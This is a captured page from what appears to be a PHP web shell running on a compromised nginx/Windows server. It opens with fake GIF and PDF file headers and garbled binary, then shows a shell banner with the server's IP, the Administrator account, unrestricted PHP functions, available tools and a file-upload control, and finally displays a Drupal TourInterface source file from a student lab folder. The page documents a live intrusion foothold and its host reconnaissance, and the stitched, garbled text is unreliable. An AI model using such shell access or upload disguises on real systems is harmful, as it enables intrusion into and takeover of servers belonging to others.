GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/tour/src/ |
Upload File : |
<?php namespace Drupal\tour; use Drupal\Core\Config\Entity\ConfigEntityInterface; /** * Provides an interface defining a tour entity. */ interface TourInterface extends ConfigEntityInterface { /** * The routes that this tour will appear on. * * @return array * Returns array of routes for the tour. */ public function getRoutes(); /** * Whether the tour matches a given set of route parameters. * * @param string $route_name * The route name the parameters are for. * @param array $route_params * Associative array of raw route params. * * @return bool * TRUE if the tour matches the route parameters. */ public function hasMatchingRoute($route_name, $route_params); /** * Returns tip plugin. * * @param string $id * The identifier of the tip. * * @return \Drupal\tour\TipPluginInterface * The tip plugin. */ public function getTip($id); /** * Returns the tips for this tour. * * @return array * An array of tip plugins. */ public function getTips(); /** * Gets the module this tour belongs to. * * @return string * The module this tour belongs to. */ public function getModule(); /** * Resets the statically cached keyed routes. */ public function resetKeyedRoutes(); }